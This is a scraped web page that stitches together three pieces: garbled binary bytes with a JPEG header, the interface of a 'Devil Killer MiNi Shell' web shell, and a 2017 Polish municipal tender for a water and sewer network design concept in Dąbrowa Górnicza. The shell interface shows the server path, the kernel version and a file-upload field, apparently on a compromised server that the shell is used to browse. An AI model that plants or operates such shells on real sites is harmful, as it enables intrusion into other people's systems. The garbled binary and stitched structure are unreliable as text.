JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170428/77126-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.dabrowa-gornicza.pl' target='_blank'>http://www.bip.dabrowa-gornicza.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 77126 - 2017
              z dnia 2017-04-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Dąbrowa Górnicza: Wykonanie koncepcji projektowej dla zadania inwestycyjnego pod nazwą Budowa sieci wodociągowej i kanalizacyjnej dla zlewni Łęka, Łosień, Okradzionów i Nowa Kuźniczka w Dąbrowie Górniczej.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Dąbrowa Górnicza, krajowy numer identyfikacyjny
              27625531200000, ul.
              ul. Graniczna 
              21,
              41300  
              Dąbrowa Górnicza, woj.
              śląskie, państwo
              Polska, tel.
              322 956 700, e-mail
              zamowienia_publiczne@dabrowa-gornicza.pl, faks
              32 2625032, 2956700.
              <br />
              Adres strony internetowej (URL): www.bip.dabrowa-gornicza.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dabrowa-gornicza.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dabrowa-gornicza.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, stanowisko nr 13  INFORMACJA</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie koncepcji projektowej dla zadania inwestycyjnego pod nazwą Budowa sieci wodociągowej i kanalizacyjnej dla zlewni Łęka, Łosień, Okradzionów i Nowa Kuźniczka w Dąbrowie Górniczej.<br /><b>Numer referencyjny: </b>Nr ZP.WIM.271.4.20.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych(Dz.U. z 2015r., poz. 2164 z późn. zm.) o wartości zamówienia poniżej 209.000,00 EUR 1.1. Przedmiotem zamówienia jest wykonanie koncepcji projektowej dla zadania inwestycyjnego pod nazwą: Budowa sieci wodociągowej i kanalizacyjnej dla zlewni Łęka, Łosień, Okradzionów i Nowa Kuźniczka w Dąbrowie Górniczej, która swoim zakresem winna obejmować budowę grawitacyjno  ciśnieniowej kanalizacji sanitarnej, deszczowej grawitacyjnej (wyłącznie w koniecznym zakresie), kanałów technologicznych dla światłowodów wraz z obiektami niezbędnymi do funkcjonowania zaprojektowanych sieci, przebudowę kolidujących sieci, budowę przyłączy do granic działek oraz budowę bądź odtworzenie dróg, chodników i wjazdów po wybudowanych sieciach wraz z infrast rukturą drogową i rowami odwadniającymi. Powyższa inwestycja swoim zakresem winna objąć ulice dzielnic Dąbrowy Górniczej Łosień, Łęka, Okradzionów i Nowa Kuźniczka stanowiące obszar nowopowstałej Aglomeracji Łosień wyznaczonej Uchwałą Sejmiku Województwa Śląskiego Nr V/25/26/2016 z dnia 27.06.2016, tj.: Etap I - w dzielnicy Łosień; Gołonoska, Świerczyna, Pocztowa, Przedziałowa, Orna, Ząbkowicka, Zagrabie, Łaskowa; Etap II - w dzielnicy Łęka; Poboczna, Przelotowa, Dąbrowszczaków, Szkotnica; Etap III - w dzielnicy Okradzionów; Białej Przemszy, Koksownicza, Ziołowa, Górna, Etap IV - Kuźniczka Nowa.

2. Przedmiot zamówienia obejmuje wykonanie i dostarczenie przez Wykonawcę nw. dokumentacji (na wszystkie ulice wymienione powyżej ujęte w etapach od I do IV):
2.1.	Mapy do celów projektowych (lub ich zakup) wraz z inwentaryzacją stanu istniejącego i uzyskaniem uzgodnień branżowych. Na mapach winny być naniesione trasy uzbrojenia z wcześniejszych ZUD-ów dotyczących przedmiotowego terenu i informacje z obowiązującego aktualnie Miejscowego Planu Zagospodarowania Przestrzennego.
2.2.	Wszelkich uzgodnień branżowych i warunków technicznych dla przedmiotowej inwestycji.
2.3.	Wypisów z ewidencji gruntów wraz z mapą ewidencyjną.
2.4.	Warunków zabudowy i zagospodarowania terenu w przypadku braku miejscowego planu zagospodarowania przestrzennego.
2.5.	Inwentaryzacji obiektów i wstępnych uzgodnień z właścicielami posesji dotyczących zakresu i lokalizacji przyłączy kanalizacyjnych z uwzględnieniem rzędnych terenu i przewodów  w formie pisemnej i graficznej.
2.6.	Uzgodnienia koncepcji projektowej z Dąbrowskimi Wodociągami przy udziale Zamawiającego.
2.7.	Koncepcji projektowej z analizą finansowo - ekonomiczną z uwzględnieniem planowanego do osiągnięcia efektu ekologicznego (w tym zasadności przedsięwzięcia pod względem wypełnienia warunków dyrektywy 91/271/EWG), szacunkowymi kosztami jakie będą niezbędne do realizacji projektu w podziale na poszczególne etapy (dzielnice) oraz koszty kwalifikowane i niekwalifikowane (w podziale na poszczególne sieci, przyłącza, roboty drogowe itp.), analizą wykonalności technicznej, analizą możliwości podłączeń mieszkańców oraz opcje techniczne (warianty wykonania).
2.8.	Wszelkich koniecznych obliczeń zlewni, ilości ścieków sanitarnych, deszczowych (wyłącznie w koniecznym zakresie) oraz wynikający z obliczeń dobór średnic, przekrój rowów itp.
2.9.	Badań geotechnicznych, hydrologicznych i geologiczno  inżynierskich w terenie na potrzeby projektowanych obiektów i sieci wraz z uzyskaniem zezwoleń i decyzji. Odwierty należy wykonać co najmniej 1 m poniżej posadowienia projektowanych przewodów.
2.10.	Inwentaryzacji zieleni uwzględniającej ewentualne przesadzenie lub wycinkę drzew i krzewów z oceną ewentualnych kolizji wykonaną w formie opisowej i graficznej, która swoim zakresem obejmie również system korzeniowy. Inwentaryzacja musi zawierać wycenę i komplet dokumentów umożliwiających uzyskanie zezwolenia na usunięcie drzew zgodnie z ustawą o ochronie przyrody z dnia 16 kwietnia 2004 roku (Dz.U. 2016.2134).
2.11.	Planu sytuacyjnego z naniesionym zakresem projektowym oraz podziałem powierzchni odtwarzanych bądź budowanych dróg i chodników (z równoczesnym wykazaniem wielkości poszczególnych powierzchni) uwzględniając podział na roboty kwalifikowane i niekwalifikowane i zestawienie ilościowe.
2.12.	Kosztorysu realizacji robót we wszystkich występujących branżach dla wszystkich ulic objętych koncepcją z podziałem na poszczególne etapy (dzielnice) uwzględniając podział na koszty kwalifikowane i niekwalifikowane
2.13.	Kosztorysu dla dwóch wariantów przebiegu kanalizacji we wszystkich występujących branżach jw. dla ulicy Gołonoskiej i Łaskowej.
2.14.	Wyliczeń kosztu prac projektowych i nadzoru autorskiego dla całości zadania obejmującego wybrany przez Zamawiającego wariant dla ul. Gołonoskiej i Łaskowej.

Wykonawca zobowiązany jest zapewnić zgodność wszystkich w/w elementów z właściwościami określonymi w SIWZ.

3.	Wszystkie planowane sieci, obiekty i elementy, składające się na zakres koncepcji muszą posiadać parametry techniczne nie niższe niż parametry przyjęte dla wcześniej skanalizowanych dzielnic w Dąbrowie Górniczej w ramach zadania Uporządkowanie gospodarki wodno-ściekowej w Gminie Dąbrowa Górnicza.
4.	Wykonawca przed opracowaniem wyceny na zamówienie publiczne zobowiązana jest zapoznać się z Planem Aglomeracji Łosień oraz układem sieci dróg w dzielnicach Łosień, Łęka, Okradzionów i Kuźniczka Nowa stanowiący załącznik nr 9 do SIWZ. 
5.	Wykonawca zobowiązany jest zapewnić zgodność wszystkich ww. elementów z właściwościami określonymi w SIWZ oraz załącznikami do SIWZ. 
6.	Wykonawca zobowiązany jest wykonać koncepcję projektową oddzielnie dla każdej dzielnicy należącej do przedmiotowej aglomeracji, oddzielnie w zakresie uwzględniającym specyfikę robót biorąc pod uwagę Załączniki do SIWZ i przyszłej Umowy. 
7.	Wykonawca zobowiązuje się do wykonania dwóch wariantów koncepcji projektowej w rejonie ulic Gołonoska i Łaskowa uwzględniając przebieg kanalizacji sanitarnej w dwóch równoległych ciągach poza jezdnią unikając jej rozbiórki z jednym ciągiem głównym. Dla każdego z wariantów Wykonawca określi szacunkowe koszty wykonania, które uwzględnią koszty prac we wszystkich branżach (z uwzględnieniem kosztów kwalifikowanych i niekwalifikowanych). Na podstawie wykonanych dwóch zestawień kosztów Zamawiający dokona wyboru wariantu do wykonania projektów budowlanych i wykonawczych. Zaprojektowana koncepcja winna spełniać wymagania wskaźnikowe, na podstawie których powstała Aglomeracja Łosień, Łęka, Okradzionów i Kuźniczka Nowa.
8.	Wykonawcę obowiązuje wymóg tajności i nie udostępniania nikomu poza Zamawiającym zakresu zamówienia w tym kosztorysów szacunkowych.
9.	Koncepcja powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć. Koncepcja będzie służyć jako opis przedmiotu zamówienia do przetargu na kompletną dokumentację projektową w oparciu o ustawę Pzp niezbędnej do pozyskania pozwolenia na budowę przedmiotowej sieci kanalizacyjnej.
10.	W swej treści powinna określać wstępne parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii i urządzeń, technologię robót, użyte materiały i zastosowane urządzenia w sposób umożliwiający zachowanie uczciwej konkurencji.
11.	Musi być zgodne z wytycznymi Unii Europejskiej. Wykonawca zobowiązuje się do nieodpłatnego naniesienia poprawek w przypadku stwierdzenia niezgodności z normami prawa europejskiego, a także w innych uzasadnionych przypadkach.
12.	Koncepcję projektową należy sporządzić w 2 egz. w wersji papierowej i 1 egz. w wersji elektronicznej (tylko do odczytu). 
13.	Koncepcja projektowa winna być przekazana Zamawiającemu na płytach CD w formie plików w formacie dwg lub dxf (część graficzna) oraz xls, doc lub pdf umożliwiających przesłanie dokumentacji drogą elektroniczną.

14. Zamówienie należy wykonać zgodnie z:
a.	Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 2016 poz.290 z późn. zm.),
b.	Ustawą z dnia z dnia 7 czerwca 2001 r. o zbiorowym zaopatrzeniu w wodę i zbiorowym 	odprowadzaniu ścieków (t.j. Dz.U.2017 poz. 328),
c.	Ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (t.j. Dz.U.2016 poz. 2134),
d.	Rozporządzeniem Ministra Infrastruktury z dnia 25 kwietnia 2012 r. w sprawie szczegółowego 	zakresu i formy projektu budowlanego (Dz.U.2012 poz.462 z późn. zm.), 
e.	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego 	zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót 	budowlanych oraz programu funkcjonalno  użytkowego (t.j. Dz.U.2013 poz.1129),
f.	Rozporządzeniem Ministra Transportu i gospodarki Morskiej z dnia 2 marca 1999 roku w sprawie 	warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (t.j. 	Dz.U.2016.124),
g.	Rozporządzeniem Rady Ministrów z dnia 9 listopada 2010 roku w sprawie przedsięwzięć 	mogących znacząco oddziaływać na środowisko (t.j. Dz.U.2016 poz. 71),
h.	innymi obowiązującymi ustawami, rozporządzeniami i normami.


15. Rozwiązania równoważne:
15.1.	Przedmiotu zamówienia nie można opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, jeżeli mogłoby to doprowadzić do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny.
15.2.	W związku z powyższym, Wykonawcy mogą składać oferty równoważne w stosunku do przedmiotu zamówienia przedstawionego w SIWZ - zgodnie z art. 30 ust. 4 i 5 ustawy Pzp. 
15.3.	Opisując przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w ust. 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą wyrazy lub równoważne.
15.4.	Zgodnie z art. 30 ust. 5 ustawy Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez  niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego. Równoważność pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych ma w szczególności zapewnić uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SIWZ.
15.5.	Równoważność rozwiązań zostanie oceniona na etapie badania złożonych ofert.

16. Ubezpieczenie
Wykonawca w okresie realizacji przedmiotu zamówienia musi posiadać aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę gwarancyjną nie mniejszą niż 600 000, 00 zł (słownie: sześćset tysięcy złotych 00/100) lub dla walut obcych na kwotę w wysokości równoważnej liczonej wg średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP i obowiązującego w dniu, w którym zamieszczone zostało ogłoszenie o zamówieniu w Biuletynie Zamówień Publicznych. Wykonawca utrzyma ważność ubezpieczenia przez cały okres realizacji Umowy.

17. Gwarancja i rękojmia
17.1.	Upływ terminu gwarancji i rękojmi na wykonanie koncepcji nastąpi z chwilą wykonania prac projektowych powstałych na podstawie koncepcji.
17.2.	Wykonawca udziela na piśmie gwarancji jakości na wykonany przedmiot zamówienia od dnia podpisania bez zastrzeżeń protokołu odbioru końcowego, a w przypadku stwierdzenia usterek, od dnia podpisania protokołu odbioru końcowego zawierającego potwierdzenie usunięcia usterek. 
17.3.	Okres gwarancyjny nie zostanie uznany za zakończony, dopóki nie zostaną usunięte przez Wykonawcę wady i usterki zgłoszone do czasu upływu terminu gwarancyjnego oraz nie wygaśnie bieg gwarancji zgodnie z art. 581 par.1 KC, a potwierdzeniem zakończenia będzie podpisany przez obie strony protokół odbioru pogwarancyjnego.
17.4.	Wykonawca jest odpowiedzialny względem Zamawiającego z tytułu rękojmi za wady dzieła zgodnie z art. 638 Kodeksu cywilnego w związku z art. 556 i następnymi Kodeksu cywilnego.
17.5.	Jeżeli Wykonawca nie usunie wad lub usterek w okresie gwarancji lub rękojmi w wyznaczonym na piśmie przez Zamawiającego terminie, Zamawiający po uprzednim zawiadomieniu Wykonawcy, może zlecić ich usunięcie osobie trzeciej na koszt Wykonawcy.
17.6.	Wykonawca zobowiązuje się wykonywać przedmiot umowy terminowo i bez usterek zgodnie z przeznaczeniem, zasadami i osiągnięciami współczesnej wiedzy techniczno-budowlanej, wymaganiami określonymi  przez Zamawiającego, normami państwowymi i branżowymi oraz przepisami Prawa budowlanego i innymi obowiązującymi w zakresie wykonywania opracowań projektowych oraz zaopatrzy ją w wykaz opracowań i oświadczenie że jest ona kompletna z punktu widzenia celu, któremu ma służyć.
17.7.	Wykonawca jest odpowiedzialny względem Zamawiającego, jeżeli dokumentacja ma wady zmniejszające jej wartość lub użyteczność ze względu na cel oznaczony w umowie, a w szczególności odpowiada za rozwiązania niezgodne parametrami ustalonymi przez Zamawiającego, normami i przepisami techniczno-budowlanymi.
17.8.	O zauważonych wadach dokumentacji projektowej Zamawiający powiadomi Wykonawcę w terminie 7 dni od ich ujawnienia celem wyegzekwowania ich usunięcia.
17.9.	Wykonawca jest odpowiedzialny względem Zamawiającego, jeżeli dokumentacja projektowa ma wady zmniejszające jej wartość lub użyteczność, a w szczególności odpowiada za rozwiązanie niezgodne z parametrami ustalonymi w normach i przepisach techniczno-budowlanych.
17.10.	Niezależnie od uprawnień przysługujących Zamawiającemu z tytułu udzielonej gwarancji jakości,  Zamawiającemu służyć będą uprawnienia z tytułu rękojmi za wady fizyczne dokumentacji projektowej.
18.	Obowiązek zatrudnienia na umowę o pracę. 
Z uwagi na charakter zamówienia wymagania względem zatrudnienia na umowę o pracę osób  wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia nie zostają wprowadzone przez Zamawiającego bowiem nie ma wypełnionych przesłanek zatrudnienia na umowę o pracę określonych w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz.U. z 2016 r., poz. 1666).

<br /><br /><b>II.5) Główny kod CPV: </b>71322200-3<br /><b> Dodatkowe kody CPV:</b>71322000-1,
                71320000-7,
                71240000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                1. Zakres usług  polegać będzie  na powtórzeniu podobnych usług,  co w zamówieniu podstawowym  
i zgodnych  z przedmiotem zamówienia podstawowego tj. w pełnym zakresie rzeczowym określonym w pkt 3.3. SIWZ.
Warunki świadczenia przyszłej usługi będą przedmiotem rokowań z Wykonawcą i będą obejmowały wymagania nie gorsze niż ustalone względem zamówienia podstawowego.
2. Zamawiający przewiduje, iż wartość tych usług może wynieść maksymalnie do 20 % wartości zamówienia podstawowego.
3. Zamówienie,  o którym mowa w art. 67 ust.1 pkt. 6 ustawy Pzp  zostanie udzielone na warunkach określonych w ustawie Pzp w trybie zamówienia z wolnej ręki.
4. Wykonawca przystąpi do wykonania usługi wyłącznie po zawarciu umowy pod warunkiem zaistnienia przesłanek o których mowa w art. 67 ust 1 pkt 6 ustawy Pzp. Przystąpienie przez Wykonawcę do realizacji zamówienia publicznego objętego protokołem konieczności, bez uprzedniego zawarcia umowy z Zamawiającym nie uprawnia Wykonawcy do żądania od Zamawiającego zapłaty wynagrodzenia za wykonanie/ częściowe wykonanie usług.       
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 150<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin zakończenia realizacji zamówienia  maksymalnie do 5 miesięcy od daty podpisania umowy; zgodnie z ofertą - od 136 do 150 dni kalendarzowych od dnia podpisania umowy.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
